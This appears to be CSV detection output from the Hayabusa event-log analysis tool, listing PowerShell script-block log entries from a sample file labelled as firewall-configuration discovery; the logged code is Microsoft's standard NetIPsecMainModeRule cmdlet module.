[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Va",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainMod",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 